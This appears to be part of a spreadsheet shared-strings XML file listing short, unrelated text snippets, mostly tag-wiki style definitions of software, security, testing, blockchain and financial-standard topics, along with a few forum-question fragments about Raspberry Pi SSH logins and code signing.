    <t>It was designed specifically to require programmers to follow best practices and respect standards while utilizing, and learning how to use, modern tools that result in optimally secure, stable and fast WordPress Themes.</t>
  </si>
  <si>
    <t>Some of the software was written by Gluu (everything with an "ox" prefix, like "oxAuth"), and some of the software we forked from existing open source projects like the Shibboleth SAML identity provider, Forgerock community release of OpenDJ, the Asimba SAML proxy, the CAS authentication server and many more components that are part of the Linux distributions.</t>
  </si>
  <si>
    <t>It provides the umbrella framework to describe the comprehensive management of health information across computerized systems and its secure exchange between consumers, providers, government and quality entities, and insurers.</t>
  </si>
  <si>
    <t>In practice, correctness is ensured by different methods, for example, theorem proving, formal verification, testing, etc.</t>
  </si>
  <si>
    <t>jPOS is an open-source, mission-critical enterprise software, based on International Organization for Standardization transaction card originated messages standard (ISO-8583).</t>
  </si>
  <si>
    <t>Work Item Tracking (tfs-workitem)
Default Build Process Templates (tfsbuild)
Area's and Iterations
Security
Reports
Default Source Control structure
A gui editor is available as part of the tfpt TFS Power Tools</t>
  </si>
  <si>
    <t>Computer security, including protection from social engineering techniques, is commonly offered in products and services of antivirus software companies.</t>
  </si>
  <si>
    <t>A blockchain is an open, distributed ledger that can record transactions between two parties efficiently and in a verifiable and permanent way.</t>
  </si>
  <si>
    <t>The tool verifies (among others):
No shared sections
Data execution prevention
Safe structured exception handling
Address space layout randomization
The tool can be downloaded from BinScope Binary Analyzer.</t>
  </si>
  <si>
    <t>Lua is certified Open Source software distributed under the terms of the MIT license.</t>
  </si>
  <si>
    <t>SmartBear Software is a software company which provides tools for software developers, quality assurance engineers and IT professionals.</t>
  </si>
  <si>
    <t>Also referred to as web scraping (web harvesting or web data extraction) is a computer software technique of extracting information from websites.</t>
  </si>
  <si>
    <t>From Bacula's home page:
Bacula is a set of Open Source, computer programs that permit you (or the system administrator) to manage backup, recovery, and verification of computer data across a network of computers of different kinds.</t>
  </si>
  <si>
    <t>In formal program verification, in particular in the Floyd-Hoare approach, loop invariants are expressed in formal predicate logic and used to prove properties of loops and, by extension, algorithms employing loops (usually correctness properties).</t>
  </si>
  <si>
    <t>Suricata is is a multi-threaded fork of the open source IDS known as Snort that is owned and maintained by the OISF (Open Information Security Foundation).</t>
  </si>
  <si>
    <t>The Financial Information eXchange (FIX) protocol is a messaging standard developed specifically for the real-time electronic exchange of securities transactions.</t>
  </si>
  <si>
    <t>FDA guideline which defines the criteria under which electronic records and electronic signatures are considered to be trustworthy, reliable and equivalent to paper records.</t>
  </si>
  <si>
    <t>Electronic payment system that enables customers of a financial institution to conduct financial transactions through that institution's website</t>
  </si>
  <si>
    <t>The underlying data structure provides software developers all the tools to rapidly develop and customize applications without compromising data integrity.</t>
  </si>
  <si>
    <t>They are a crucial component of telecommunications systems, banking systems, video games, and just about any other software system or electronic device that maintains some amount of persistent information.</t>
  </si>
  <si>
    <t>Bacula is a set of Open Source, computer programs that permit you (or the system administrator) to manage backup, recovery, and verification of computer data across a network of computers of different kinds</t>
  </si>
  <si>
    <t>Functional testing is a quality assurance (QA) process and a type of black box testing that bases its test cases on the specifications of the software component under test.</t>
  </si>
  <si>
    <t>An access violation (also known as segmentation fault) is generally an attempt to access memory that the CPU cannot physically address.</t>
  </si>
  <si>
    <t>Because proprietary software authors withhold their source code, their patches are distributed as binary executables instead of source.</t>
  </si>
  <si>
    <t>Online tracking or web tracking refers to the act of monitoring user events and is majorly accompanied with a statistic or analytic tool to take out inferences from the gathered user data based on users' online behaviour.</t>
  </si>
  <si>
    <t>Features:
Isolated user-mode applications
Real-time processes
Memory protection
Efficient interprocessing, such as Transparent Inter-Process Communication (TIPC)
Error handling
Support for symmetric multiprocessing (SMP) and asymmetric multiprocessing (AMP)
Binary, counting and mutual exclusion semaphores with priority inheritance
Multitasking kernel with preemptive round-robin scheduling and fast interrupt response
POSIX PSE52-certified compatibility with user-mode execution environment
Distributed and local message queues
VxSim simulators
Virtualization profile.</t>
  </si>
  <si>
    <t>Yodlee is a long standing and trusted provider for aggregation and categorization of financial information across thousands of financial institutions including the top banks in the United States.</t>
  </si>
  <si>
    <t>A type of memory corruption that occurs in a computer program when the contents of a memory location are unintentionally modified due to programming errors</t>
  </si>
  <si>
    <t>Its design is based on usage of a trusted third-party (the key distribution center "KDC") which allows IP hosts to communicate over a non-secure network to prove their identity to one another in a secure manner.</t>
  </si>
  <si>
    <t>Functional testing is a quality assurance (QA) process  and a type of black box testing that bases its test cases on the specifications of the software component under test.</t>
  </si>
  <si>
    <t>Last login: Sun Sep 17 23:16:57 2017 from peces.local
pi@raspberrypi:~ $
On the other hand, any help about how to write the password into a variable in the Python script to login automatically, I mean:
xxx@xxx:~$ python connect_raspberry.py
The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.</t>
  </si>
  <si>
    <t>The following design constraints are considered:
Binary structure should mirror protocol definitions and be self-evident under casual reading
Mapping binary structures to types should be statically verified
Encoding and decoding should be purely functional
Failures in encoding and decoding should provide descriptive errors
Compiler plugin should not be used
As a result, the library is implemented as a combinator based DSL.</t>
  </si>
  <si>
    <t>TotalView is a GUI-based source code defect analysis tool from RogueWave that gives you unprecedented control over processes and thread execution and visibility into program state and variables.</t>
  </si>
  <si>
    <t>UVM is derived mainly from the OVM (Open Verification Methodology) which was, to a large part, based on the eRM (eReuse Methodology) for the eVerification Language developed by Verisity Design in 2001.</t>
  </si>
  <si>
    <t>Software
A software sniffer can generally only capture network data either originating from or going to the computer running it, plus any "broadcast" messages, if the computer is connected to the network via a switch.</t>
  </si>
  <si>
    <t>It is designed to be used by people with a wide range of security experience and as such is ideal for developers and functional testers who are new to penetration testing.</t>
  </si>
  <si>
    <t>The online
  banking system will typically connect to or be part of the core
  banking system operated by a bank and is in contrast to branch banking
  that was the traditional way customers access banking services.</t>
  </si>
  <si>
    <t>Application and registration procedures for Institution Identification Codes: http://www.iso.org/iso/home/store/catalogue_tc/catalogue_detail.htm?csnumber=23632
Part 3.</t>
  </si>
  <si>
    <t>First i don't know about locking the web folder and prevent them from looking into it but..
As most of Applications do, read these steps: 
- First the Legal protection:
1- make a Contract with a good lawyer to protect your work and money 
2- Register your source code in a Rights Protection organizations.</t>
  </si>
  <si>
    <t>Unfortunately, using the hotword command gives me a segmentation fault:
What I tried so far:
Registering the device like in this post is successful, seg fault
still appears:
Google Assistant on Raspberry pi Segmentation fault
My Google Assistant API is tuned on 
Without project id it works, as
stated here:
Google Assistant on Raspberry Pi 3 Segmentation fault
What I noticed is, that also my google assistant app on the phone says I have 0 local devices.</t>
  </si>
  <si>
    <t>ethereum is an open-source, public, blockchain-based distributed computing platform featuring smart contract (scripting) functionality.</t>
  </si>
  <si>
    <t>In computer science an entity is an object which has an identity and can be uniquely determined, holds storable information or can be processed.</t>
  </si>
  <si>
    <t>Ther term tracking is applied to various domains of computer science like online tracking, video tracking, etc.</t>
  </si>
  <si>
    <t>They are binary files which typically require Flash authoring software to be edited, and are compiled by the authoring software into publishable SWF files.</t>
  </si>
  <si>
    <t>Copy protection, also known as content protection, copy obstruction, copy prevention and copy restriction, is any effort designed to prevent the reproduction of software, films, music, and other media, usually for copyright reasons.</t>
  </si>
  <si>
    <t>The use of formal methods for software and hardware design is motivated by the expectation that, as in other engineering disciplines, performing appropriate mathematical analysis can contribute to the reliability and robustness of a design.</t>
  </si>
  <si>
    <t>Generally speaking, developing for Azure Government should be very similar to developing for regular Azure, however there are a few things to keep in mind such as:
You must be an entity validated by the US Government to dev/test in Azure Government.</t>
  </si>
  <si>
    <t>Antivirus or anti-virus software is software used to prevent, detect and remove malware (of all descriptions), such as:
Computer viruses, adware, backdoors, malicious BHOs, dialers, fraudtools, hijackers, keyloggers, malicious LSPs, rootkits, spyware, trojan horses and worms.</t>
  </si>
  <si>
    <t>sqlmap is an open source penetration testing tool that automates the process of detecting and exploiting SQL injection flaws and taking over of database servers.</t>
  </si>
  <si>
    <t>In computer security, a login or logon (also called logging in or on and signing in or on) is the process by which individual access to a computer system is controlled by identifying and authenticating the user referring to credentials presented by the user.</t>
  </si>
  <si>
    <t>A computer virus is a computer program that can replicate itself and spread from one computer to another.</t>
  </si>
  <si>
    <t>Risk analysis is the identification, assessment, and quantification of risks in terms of severity and probability for a certain event.</t>
  </si>
  <si>
    <t>Such tools are often used in the search for memory leaks and other such flaws in running programs.</t>
  </si>
  <si>
    <t>Memory safety is a concern in software development that aims to avoid software bugs that cause security vulnerabilities dealing with random-access memory (RAM) access, such as buffer overflows and dangling pointers.</t>
  </si>
  <si>
    <t>The document, view, security and replication  models, the special purpose query language, the efficient and robust disk layout are all carefully integrated for a reliable and efficient system.</t>
  </si>
  <si>
    <t>You join the Made for iPod and Works with iPhone Licensing Program - it involves a few NDAs and legal documents, then they give you the specifications for connecting with and communicating through the i/o port or bluetooth.</t>
  </si>
  <si>
    <t>Open Financial Exchange is being used by CheckFree, Intuit, Microsoft and many others as the mechanism for supporting financial data exchange in their products and services.</t>
  </si>
  <si>
    <t>mincemeat.py is a lightweight, fault tolerant, secure, open source Python implementation of the MapReduce distributed computing framework.</t>
  </si>
  <si>
    <t>ABBYY's recognition technologies help people manage the increasing amount of information delivering powerful instruments which enable them to unlock information from paper and images, automatically acquire data, and process and store valuable information.</t>
  </si>
  <si>
    <t>Address space layout randomization (ASLR) is a computer security technique which involves randomly arranging the positions of key data areas, usually including the base of the executable and position of libraries, heap, and stack, in a process's address space.</t>
  </si>
  <si>
    <t>The term rootkit is a concatenation of "root" (the traditional name of the privileged account on Unix operating systems) and the word "kit" (which refers to the software components that implement the tool).</t>
  </si>
  <si>
    <t>They operate an U.S.-based blockchain trading platform, which is designed for customers who demand lightning-fast trade execution, dependable digital wallets, and industry-leading security practices.</t>
  </si>
  <si>
    <t>Typically, the systems one has in mind are hardware or software systems, and the specification contains safety requirements such as the absence of deadlocks and similar critical states that can cause the system to crash.</t>
  </si>
  <si>
    <t>The project has been actively developed since 2001, is available in more than 40 languages, and has the best security track record of any major CMS.</t>
  </si>
  <si>
    <t>The most common types of audit controls are (see "Information technology audit" article on Wikipedia):
Data Capture Controls  ensures that all transactions are recorded in
the application system, transactions are recorded only once, and
rejected transactions are identified, controlled, corrected, and
re-entered into the system.</t>
  </si>
  <si>
    <t>For the purpose of performing permission checks, traditional UNIX implementations distinguish two categories of processes: privileged processes (whose effective user ID is 0, referred to as superuser or root), and unprivileged processes (whose effective UID is nonzero).</t>
  </si>
  <si>
    <t>Lesson: If you program a microcontroller, never treat it as pure software :)  
7) For advanced memory corruption analysis you can set the stack to a specific predefined state.</t>
  </si>
  <si>
    <t>Computer data logging is the process of recording events in a computer program or computer system, usually with a certain scope, in order to provide an audit trail that can be used to understand the activity of the system and to diagnose problems.</t>
  </si>
  <si>
    <t xml:space="preserve">
Adobe LiveCycle Enterprise Suite 4 is an enterprise document and form platform that helps you capture and process information, deliver personalized communications, and protect and track sensitive information.</t>
  </si>
  <si>
    <t>Founded in 2003 and actively maintained by the Spring Team since, today it is used to secure numerous demanding environments including government agencies, military applications and central banks.</t>
  </si>
  <si>
    <t>References
OpenID Connect and JS applications with  | Mickal Derriey's blog
IdentityModel/oidc-client-js: OpenID Connect (OIDC) and OAuth2 protocol support for browser-based JavaScript applications
oidc-client | npm
Certified OpenID Connect Implementations | OpenID
The Web SSO Standard OpenID Connect: In-Depth Formal Security Analysis and Security Guidelines (pdf)</t>
  </si>
  <si>
    <t>A set of middleware programs and tools that provide the underlying base that enable applications to be interoperable across operating systems.</t>
  </si>
  <si>
    <t>802.11 is a family of IEEE technical standards for mobile communication devices such as laptop computers or multi-mode phones to join a wireless local area network (WLAN) widely used in the home, public hotspots and commercial establishments.</t>
  </si>
  <si>
    <t>Typically used to describe a web form that collects personal information from a user.</t>
  </si>
  <si>
    <t>Trusted computing is developed and promoted by the Trusted Computing Group (TCG).</t>
  </si>
  <si>
    <t>BackTrack was a distribution based on the Debian GNU/Linux distribution aimed at digital forensics and penetration testing use.</t>
  </si>
  <si>
    <t>(2) In the analysis of malicious software such as worms, viruses and Trojans, it refers to the software's harmful results.</t>
  </si>
  <si>
    <t>There are general three properties that we associate with secure communication:
confidentiality: some information must be stored or transfered without permitting unauthorized entities to read it;
integrity: some information must be stored or transfered without allowing any alteration by an unauthorized entity to go unnoticed;
authenticity: some information must be stored or transfered in such a way that the originator of the information can be verified, in a way which unauthorized entities cannot falsify.</t>
  </si>
  <si>
    <t>Real mode is characterized by 
a 20-bit segmented memory address space (giving exactly 1 MiB of addressable memory) and 
unlimited direct software access to all addressable memory, I/O addresses and peripheral hardware, it
provides no support for memory protection, multitasking, or code privilege levels.</t>
  </si>
  <si>
    <t>OPNsense is a fork of pfSense and is therefor a open source firewall/router computer software distribution based on FreeBSD.</t>
  </si>
  <si>
    <t>Proprietary HP fault-tolerant server with associated operating system (Guardian) and tools.</t>
  </si>
  <si>
    <t>In late 2010 Fortify Software became a part of Hewlett-Packard, after which the "360" product became "HP Fortify Software Security Center".</t>
  </si>
  <si>
    <t>Although specifics may vary from system to system, a general convention is that executable programs and system wide configurations are stored in shared directories while users' home directories are reserved for their personal information, be it password files, documents or even source code they're developing.</t>
  </si>
  <si>
    <t>Section 508c is a United States government mandate requiring all software procured by the government to meet accessibility guidelines.</t>
  </si>
  <si>
    <t>with 
However this is hardly a reliable approach, since it requires that you 
examine every possible event structure generated by every potential service and 
successfully and confidently identify for each service of interest a key or set of keys that is always reliably present in the service's events and unique to them.</t>
  </si>
  <si>
    <t>The standard describes an "open, secure, portable, efficient and extensible format for the packaging and distribution of software to be run in virtual machines".</t>
  </si>
  <si>
    <t>What I really try to write is to run a script in konsole:  python code.py and that it returns to me to the Rasp prompt (I suppose I should write the password into a variable but first, I try to log in automatically and write the password):
xx@xx:~$ python code.py
pi@169.254.249.166's password: 
The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.</t>
  </si>
  <si>
    <t>Corda is a distributed ledger platform designed to record, manage and automate legal agreements between business partners.</t>
  </si>
  <si>
    <t>The AppKey should be unique for each device.The user can derive their own AppKey
The AppEUI is a global application ID in IEEE EUI64 address space that uniquely identifies the entity able to process the JoinReq frame.</t>
  </si>
  <si>
    <t>Risk Management is the identification, categorization and planning centered around the threats and opportunities associated with any given scenario.</t>
  </si>
  <si>
    <t>pfSense is an open source firewall/router computer software distribution based on FreeBSD.</t>
  </si>
  <si>
    <t>BinScope is a Microsoft verification tool that analyzes binaries to ensure that they have been built in compliance with Microsofts Security Development Lifecycle (SDL) requirements and recommendations.</t>
  </si>
  <si>
    <t>The VoiceXML Forum, an industry group promoting the use of the standard, provides a conformance testing process that certifies vendors' implementations as conformant.</t>
  </si>
  <si>
    <t>In everyday terms, functional verification attempts to answer the question "Does this proposed design do what is intended?"</t>
  </si>
  <si>
    <t>Functionally, a blockchain can serve as "an open, distributed ledger that can record transactions between two parties efficiently and in a verifiable and permanent way.</t>
  </si>
  <si>
    <t>iRedMail is a free, open source mail server solution for Linux/BSD, provides services POP3/IMAP/SMTP, anti-spam, anti-virus, etc.</t>
  </si>
  <si>
    <t xml:space="preserve">
The Financial Information Exchange (FIX) Protocol is a message standard developed to facilitate the electronic exchange of information related to securities transactions.</t>
  </si>
  <si>
    <t>Radare2, sometimes referred to as r2, is a portable set of tools designed for reverse engineering binaries.</t>
  </si>
  <si>
    <t>Open Bank Projects open source API technology and surrounding ecosystem of tools  together with a vibrant Fintech developer community - helps banks rapidly engage with the next generation innovators safely and securely.</t>
  </si>
  <si>
    <t>Hierarchical Temporal Memory (HTM) is a biologically-constrained theory of intelligence originally described in the book On Intelligence.</t>
  </si>
  <si>
    <t>SafariWatir is a free, open-source functional testing tool for driving the Safari browser the same way an end user would.</t>
  </si>
  <si>
    <t>Such failures are investigated using the methods of forensic engineering, which aims to isolate the cause or causes of failure.</t>
  </si>
  <si>
    <t>Software cracking is the modification of software to remove or disable features which are considered undesirable by the person cracking the software, usually related to protection methods: (copy protection, protection against the manipulation of software), trial/demo version, serial number, hardware key, date checks, CD check or software annoyances like nag screens and adware.</t>
  </si>
  <si>
    <t>Chromium OS is an open-source project that aims to build an operating system that provides a fast, simple, and more secure computing experience for people who spend most of their time on the web.</t>
  </si>
  <si>
    <t>Fraud describes wrongful or criminal deception intended to result in financial or personal gain, and it also describes a person or thing intended to deceive others, typically by unjustifiably claiming or being credited with accomplishments or qualities.</t>
  </si>
  <si>
    <t>Decryption is the process of transforming encrypted information (referred to as ciphertext) using an algorithm (called cipher) and some special knowledge, usually referred to as a key, to make it readable to anyone (referred to as plaintext).</t>
  </si>
  <si>
    <t>The innovative features of ELFsh make it usable by reverse engineers and security analysts for embedded debugging and plain C code injection in binary programs and processes, execution flow redirection that allow for dynamic analyzers generation and testing on binary programs.</t>
  </si>
  <si>
    <t>Application Verifier is designed specifically to detect and help debug memory corruptions and critical security vulnerabilities.</t>
  </si>
  <si>
    <t>So I create my cat file with inf2cat (/os:10_X64) - no errors reported ("Catalog generation complete")
Then I sign the cat file with this command:
"C:\Program Files\Microsoft SDKs\Windows\v7.0A\Bin\signtool" sign /f ..\MyCertificate.pfx /p MyPassword /t http://timestamp.verisign.com/scripts/timstamp.dll /v myfile.cat
This is reported as successful.</t>
  </si>
  <si>
    <t>Great Expectations is an open source software that helps teams promote analytic integrity by offering a unique approach to data pipeline testing.</t>
  </si>
  <si>
    <t>Mathcad is computer software primarily intended for the verification, validation, documentation and re-use of engineering calculations.</t>
  </si>
  <si>
    <t>A common mail filtering installation with Amavis consists of a Postfix as an MTA, SpamAssassin as a spam classifier, and ClamAV as an anti-virus protection, all running under a Unix-like operating system.</t>
  </si>
  <si>
    <t>Use this tag to ask questions regarding Windows Information Protection, Office Information Protection, and Azure Information Protection.</t>
  </si>
  <si>
    <t>A login or logon (also called logging in or on and signing in or on) is the process by which individual access to a computer system is controlled by identification of the user using credentials provided by the user.</t>
  </si>
  <si>
    <t>Typical implementations include issue tracking, bug tracking and change tracking systems.</t>
  </si>
  <si>
    <t>Each attribute is uniquely identified by a Universally Unique Identifier (UUID), which is a standardized 128-bit format for a string ID used to uniquely identify information.</t>
  </si>
  <si>
    <t>Virtualization helps in: 
Better use of under-utilized computers
Hardware Independence
Data protection
I) Virtualization can be done at zonal level, software or hardware.</t>
  </si>
  <si>
    <t>Return-oriented programming (ROP) is a computer security exploit technique that allows an attacker to execute code in the presence of security defenses such as non-executable memory and code signing.</t>
  </si>
  <si>
    <t>rkt can run the same container with varying degrees of protection, from lightweight, OS-level namespace and capabilities isolation to heavier, VM-level hardware virtualization.</t>
  </si>
  <si>
    <t>This tag should be used for programming questions related to softwares used for the prevention and removal of malware threats, rather than computer security implemented by software methods.</t>
  </si>
  <si>
    <t>Integrated Windows Authentication (iwa) is a term associated with Microsoft products that refers to the spnego, kerberos, and ntlm authentication protocols with respect to sspi functionality introduced with Microsoft Windows 2000 and included with later Windows NT-based operating systems.</t>
  </si>
  <si>
    <t>Even though there may be semantics that are environment-specific, most leak prevention is based on simple practices that depend on the type of memory environment the program is working in.</t>
  </si>
  <si>
    <t>YARA is a tool aimed at (but not limited to) helping malware researchers to identify and classify malware samples.</t>
  </si>
  <si>
    <t>Piracy is the use of works under copyright, infringing the copyright holder's exclusive rights, such as the right to reproduce, distribute, display or perform the copyrighted work, or to make derivative works, without permission from the copyright holder, which is typically a publisher or other business representing or assigned by the work's creator.</t>
  </si>
  <si>
    <t>Chromium OS is an open-source project that aims to build an operating system that provides a fast, simple, and more secure computing experience for people who spend most of their time on the web</t>
  </si>
  <si>
    <t>http://en.wikipedia.org/wiki/E_(verification_language)
The e language uses an Aspect-Oriented Programming (AOP) approach, which is an extension of the object-oriented programming approach to specifically address the needs required in functional verification.</t>
  </si>
  <si>
    <t>It's found on GitHub here:
https://github.com/EOSIO/eos
Questions tagged with 'eos' or 'eos.io' will typically refer to the blockchain software, and to questions about configuring it, forking it, installing it, running it, or writing smart contracts on it.</t>
  </si>
  <si>
    <t>Replication is the process of sharing information so as to ensure consistency between redundant resources, such as software or hardware components, to improve reliability, fault-tolerance, or accessibility.</t>
  </si>
  <si>
    <t>Segmentation fault usually occurs when a user space program reads or writes an illegal memory address.</t>
  </si>
  <si>
    <t>Thinktecture IdentityServer is an open source security token service based on Microsoft technologies designed around Claims Based Authentication and Windows Identity Foundation.</t>
  </si>
  <si>
    <t>Microsoft Application Verifier is a runtime verification tool for native code that assists in finding subtle programming errors that can be difficult to identify with normal application testing.</t>
  </si>
  <si>
    <t>Extract the code structure from documented or undocumented source files.</t>
  </si>
  <si>
    <t>Integrated Windows Authentication (IWA) is a term associated with Microsoft products that refers to the SPNEGO, Kerberos, and NTLMSSP authentication protocols with respect to SSPI functionality introduced with MS-Windows 2000 and included with later Windows NT-based OSs.</t>
  </si>
  <si>
    <t>Cassandra advertises itself to have the following merits:
Proven (used by many large established companies);
Performant (peforms consistently well on NoSQL benchmarks);
Fault tolerant (data is automatically replicated to multiple nodes for fault-tolerance.</t>
  </si>
  <si>
    <t>The Automatic Bug Report Tool (abrt) is a set of tools that helps ensure bugs (application crashes) are detected and reported.</t>
  </si>
  <si>
    <t>Other cryptographic techniques based on passwords, such as
  password-based key entity authentication and key establishment
  protocols [4][5][26] are outside the scope of this document.</t>
  </si>
  <si>
    <t>A location on a computer used to store certificates, often in categories based on usage.</t>
  </si>
  <si>
    <t>It is the first open source certified implementation of the SIP Servlet v1.1 (JSR 289 Spec) on top of Tomcat &amp; JBoss containers and strive to feature best performances, security, foster innovation and develop interoperability standards between Sip Servlets and JSLEE so that applications may exploit the strengths of both.</t>
  </si>
  <si>
    <t>It provides tools, libraries, and reusable components for creating and using independent digital identities rooted on blockchains or other distributed ledgers so that they are interoperable across administrative domains, applications, and any other silo.</t>
  </si>
  <si>
    <t>Using API Contract information is not a good proxy, as you have found (although it should return , not crash, on desktop -- that's a bug).</t>
  </si>
  <si>
    <t>Formal methods are a particular kind of mathematically-based techniques for the specification, development and verification of software and hardware systems.</t>
  </si>
  <si>
    <t>F* (pronounced F star) is an ML-like functional programming language aimed at program verification.</t>
  </si>
  <si>
    <t>rasa NLU is an open source tool for intent classification and entity extraction.</t>
  </si>
  <si>
    <t>** Fraud describes wrongful or criminal deception intended to result in financial or personal gain, and it also describes a person or thing intended to deceive others, typically by unjustifiably claiming or being credited with accomplishments or qualities.</t>
  </si>
  <si>
    <t>The companys patent-pending software is based on Googles Chromium open-source project and purpose-built to meet the security and performance needs of real-time financial applications.</t>
  </si>
  <si>
    <t>JCAPTCHA stands for Java Completely Automated Public Test to tell Computers and Humans Apart
The open source java framework for captcha definition and integration</t>
  </si>
  <si>
    <t>Record linkage refers to the task of finding records in a data set that refer to the same entity when the entities do not have unique identifiers.</t>
  </si>
  <si>
    <t>Logging in and signing in is the process by which individual access to a computer system is controlled by identifying and authenticating the user through the credentials presented by the user.</t>
  </si>
  <si>
    <t>Scales to 100Ms of events per day
Open source
No vendor lock-in
Developed by a growing community passionate about data</t>
  </si>
  <si>
    <t>This pattern has been referred to as a self-executing anonymous function, but Ben Alman introduced the term IIFE as a more semantically accurate term for the pattern.</t>
  </si>
  <si>
    <t>Logging in or on and signing in or on is the process by which an individual access to a computer system is controlled by identifying and authenticating the user through the credentials presented by the user.</t>
  </si>
  <si>
    <t>When the corrupted memory contents are used later in that program, it leads either to program crash or to strange and bizarre program behavior.</t>
  </si>
  <si>
    <t>It is designed from the ground up to provide regulatory compliant storage for Protected Health Information (PHI) and Personally Identifiable Information (PII).</t>
  </si>
  <si>
    <t>Software testing can also provide an objective, independent view of the software to allow the business to appreciate and understand the risks of software implementation.</t>
  </si>
  <si>
    <t>(source: Wikipedia)
mandatory access control (MAC): The mandatory part of the definition indicates that enforcement of controls is performed by administrators and the operating system.</t>
  </si>
  <si>
    <t>In terms of the internet and computer geolocation can be performed by associating a geographic location with the Internet Protocol (IP) address, MAC address, RFID, hardware embedded article/production number, embedded software number (such as UUID, Exif/IPTC/XMP or modern steganography), invoice, Wi-Fi connection location, or device GPS coordinates, or other, perhaps self-disclosed information.</t>
  </si>
  <si>
    <t>Given a program in PROMELA, Spin can verify the model for correctness by performing random or iterative simulations of the modeled system's execution, or it can generate a C program that performs a fast exhaustive verification of the system state space.</t>
  </si>
  <si>
    <t>To generate the segmentation fault, linux-kernel will deliver signal 11 to the process which has made illegal memory access.</t>
  </si>
  <si>
    <t>Featured functionalities
Authenticate and authorize your users with Upwork
Search for freelancers and find jobs 
Create job postings 
Invite freelancers to an interview 
Make job offers 
Manage existing contracts 
Make custom payments 
Close contracts 
Manage activities for your team 
Manage, send and receive messages 
Retrieve time and financial reports for freelancers, teams and companies 
Manage work diary snapshots 
Retrieve metadata information - available categories, tests, skills, regions, etc.</t>
  </si>
  <si>
    <t>Stress testing is for ensuring fault tolerance capability of the application: it refers to tests that put a greater emphasis on robustness, availability and error handling under a heavy load, rather than on what would be considered correct behavior under normal circumstances.</t>
  </si>
  <si>
    <t>The Payment Card Industry Data Security Standard is a worldwide information security standard assembled by the Payment Card Industry Security Standards Council (PCI SSC).</t>
  </si>
  <si>
    <t>Together, these features allow expressing precise and compact specifications for programs, including functional correctness and security properties.</t>
  </si>
  <si>
    <t>[4] In addition, it may record events such as authentication and authorization failures, and include auditing functionality, which permits verifying the correctness of procedures carried out based on accounting data.</t>
  </si>
  <si>
    <t>This document provides recommendations for the implementation of
  password-based cryptography, covering key derivation functions,
  encryption schemes, message-authentication schemes, and ASN.1 syntax
  identifying the techniques.</t>
  </si>
  <si>
    <t>CryptoJS is a growing collection of standard and secure cryptographic algorithms implemented in JavaScript using best practices and patterns.</t>
  </si>
  <si>
    <t>IBM MobileFirst Quality Assurance, part of the IBM MobileFirst Platform, takes mobile application testing beyond the test lab by directly engaging with testers and end users in the process.</t>
  </si>
  <si>
    <t>XML validation is the procedure of checking an XML document against some kind of schema that describes rules that this type of document must conform to.</t>
  </si>
  <si>
    <t>In a relational database, a weak entity is an entity that cannot be uniquely identified by its attributes alone; therefore, it must use a foreign key in conjunction with its attributes to create a primary key.</t>
  </si>
  <si>
    <t>HTK - HMM Tool Kit  
A set of tools for training, testing and deploying Hidden Markov Models for statistical machine learning tasks, such as Speaker Verification and Recognition</t>
  </si>
  <si>
    <t>It was designed as an automation and testing tool, and it makes it trivial to interact with complex programs, such as remote shells and security maintenance.</t>
  </si>
  <si>
    <t>ISO 8583 Financial transaction card originated messages  Interchange message specifications is the International Organization for Standardization standard for systems that exchange electronic transactions made by cardholders using payment cards.</t>
  </si>
  <si>
    <t>Verification failures are reported as unit test failures, identifying specific lines instead of throwing exceptions.</t>
  </si>
  <si>
    <t>Handling of transaction commit failures provides the new
System.Data.Entity.Infrastructure.CommitFailureHandler which makes
use of the newly introduced ability to intercept transaction
operations.</t>
  </si>
  <si>
    <t>Test techniques include, but are not limited to, the process of executing a program or application with the intent of finding software bugs (errors or other defects).</t>
  </si>
  <si>
    <t>HL7 also refers to some of the specific standards created by the organization that provide a comprehensive framework for the exchange, integration, sharing, and retrieval of electronic of health information.</t>
  </si>
  <si>
    <t>Iroha has essential functionality for asset, information or identity management, at the same time being an efficient and trustworthy byzantine fault-tolerant tool for your enterprise needs.</t>
  </si>
  <si>
    <t>A few examples of .NET Obfuscation and Application Protection features included in Dotfuscator are:
Dotfuscator implements various .NET Obfuscation and Application Protection techniques that complement each other to create a layered defense making reverse engineering, tampering, unauthorized debugging much more difficult.</t>
  </si>
  <si>
    <t>The following subelements can be part of a security-constraint:
Web resource collection,
A list of URL patterns (the part of a URL after the host name and port you want to constrain) and HTTP operations (the methods within the files that match the URL pattern you want to constrain) that describe a set of resources to be protected.</t>
  </si>
  <si>
    <t>Wi-Fi products that complete the Wi-Fi Alliance interoperability certification testing successfully can use the Wi-Fi CERTIFIED designation and trademark.</t>
  </si>
  <si>
    <t>Visual Leak Detector is an open-source memory leak detection system for Visual C++.</t>
  </si>
  <si>
    <t>It can operate in three different transaction models: the Two Phased Lock model (TPL), the Multiversion Concurrency Control Model (MVCC) and a mixed, pessimistic multiversion model with snapshot isolation.</t>
  </si>
  <si>
    <t>A fuzzer is a tool used to provide invalid and unexpected data to the inputs of a program in order to obtain crashes, memory leaks or invalid program states.</t>
  </si>
  <si>
    <t>A software code audit is a comprehensive analysis of source code in a programming project with the intent of discovering bugs, security breaches or violations of programming conventions.</t>
  </si>
  <si>
    <t>INVALID: If a page fault occurs for a reference to an address that is not part of the virtual address space, meaning there cannot be a page in memory corresponding to it, then it is called an invalid page fault.</t>
  </si>
  <si>
    <t>It is aimed at digital forensics and penetration testing use.</t>
  </si>
  <si>
    <t>It is developed and regulated by Esri as a (mostly) open specification for data interoperability among Esri and other software products.</t>
  </si>
  <si>
    <t>Kali Linux is a Debian-based Linux distribution aimed at advanced Penetration Testing and Security Auditing.</t>
  </si>
  <si>
    <t>The FreeRADIUS project is an open source, multi-protocol (RADIUS, EAP, DHCP, BFD) policy server.FreeRADIUS' primarily role is a AAA (Authentication, Authorization, and Accounting) server, but can also be used as part of an IPAM (IP Address Management) solution, and as an event distribution server.</t>
  </si>
  <si>
    <t>External testers will have access after the build has undergone a beta app review process which typically takes less time than a full review for the App Store.</t>
  </si>
  <si>
    <t>API access is provided for aggregation of financial information across thousands of financial institutions.</t>
  </si>
  <si>
    <t>This term is generally used in association with iOS devices, but can be used to describe the rooting process for other devices.</t>
  </si>
  <si>
    <t>A data contract is a formal agreement between a service and a client that abstractly describes the data to be exchanged.</t>
  </si>
  <si>
    <t>Vera++ is a programmable tool for verification, analysis and transformation of C++ source code.</t>
  </si>
  <si>
    <t>The leak tag refers to a memory leak, which has a very specific meaning with regards to programming.</t>
  </si>
  <si>
    <t>HL7 and its members provide a framework (and related standards) for the exchange, integration, sharing, and retrieval of electronic health information.</t>
